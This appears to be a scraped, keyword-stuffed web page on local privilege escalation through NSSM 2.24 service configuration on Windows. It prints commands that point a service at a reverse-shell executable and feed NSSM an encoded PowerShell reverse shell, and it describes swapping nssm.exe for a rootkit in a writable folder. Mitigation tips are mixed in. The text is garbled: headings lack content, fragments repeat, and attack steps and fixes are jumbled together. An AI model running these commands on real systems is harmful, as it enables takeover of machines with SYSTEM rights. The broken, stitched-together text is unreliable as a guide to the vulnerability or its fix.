Nssm-2.24 Privilege Escalation =link=

The "Non-Sucking Service Manager" (NSSM) version 2.24 is frequently featured in cybersecurity "stories" or labs because it is a textbook example of how a helpful administrative tool can be turned into a vehicle for Local Privilege Escalation (LPE) on Windows systems. The Core Vulnerability

Impact and Risk Assessment

sc config MyNSSMService binPath= "cmd.exe /c C:\temp\reverse_shell.exe"

nssm set LegacyApp AppParameters "C:\Windows\System32\cmd.exe /c powershell -enc <base64 reverse shell>"

• Correct Usage: nssm install ServiceName "C:\Program Files\My Service\service.exe"

Improper File Permissions: Many applications bundle nssm.exe but fail to secure its directory. For example, if a "Users" group has full control (the 'F' flag) over the binary or its parent folder, an attacker can replace nssm.exe with a malicious rootkit. When the service restarts, it executes the replacement with elevated privileges. nssm-2.24 privilege escalation

Or, if using NSSM directly:

Change binary path to secure location

sc config MyNSSMService binPath= "C:\Program Files\SecureApp\app.exe" obj="NT AUTHORITY\LocalService" The "Non-Sucking Service Manager" ( NSSM ) version 2

Use a Service Account with Least Privilege – Configure NSSM services to run as a managed service account (gMSA) instead of LOCAL SYSTEM. nssm set LegacyApp AppParameters "C:\Windows\System32\cmd